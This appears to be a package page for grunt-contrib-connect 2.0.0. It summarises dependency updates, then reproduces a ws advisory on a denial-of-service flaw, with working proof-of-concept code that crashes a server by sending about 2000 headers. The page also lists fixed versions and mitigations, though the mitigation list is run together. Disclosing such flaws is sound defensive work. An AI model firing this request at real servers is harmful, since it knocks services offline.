Grunt-contrib-connect version 2.0.0 represents a significant update over the previous stable version 1.0.2, bringing enhanced functionality and dependency updates beneficial for developers. One key difference lies in the updated dependencies; version 2.0.0 incorporates newer versions of crucial packages like opn, async, morgan, connect, node-http2,portscanner, serve-index, serve-static, and connect-livereload. This ensures compatibility with the latest web development standards and leverages potential performance improvements and bug fixes present in those updated dependencies. Specifically, the move to node-http2 package allows for HTTP/2 support, potentially improving website loading times and overall performance. The update from opn version 4 to version 5 ensures your default browser will be opened in a more secure manner.
For developers, these upgrades translate to a more robust and modern development environment. The newer versions of connect and serve-static likely include improvements in handling static files and middleware, allowing for more efficient web server configurations. The updates to the listed devDependencies means faster and improved code checking and testing for the developer, because they incorporate, grunt-contrib-jshint,grunt-contrib-internal ,grunt-contrib-nodeunit at their latest versions. Overall, the transition to version 2.0.0 provides a more streamlined and feature-rich experience for serving web applications during development, encouraging more secure and performant local web-server setups.
All the vulnerabilities related to the version 2.0.0 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.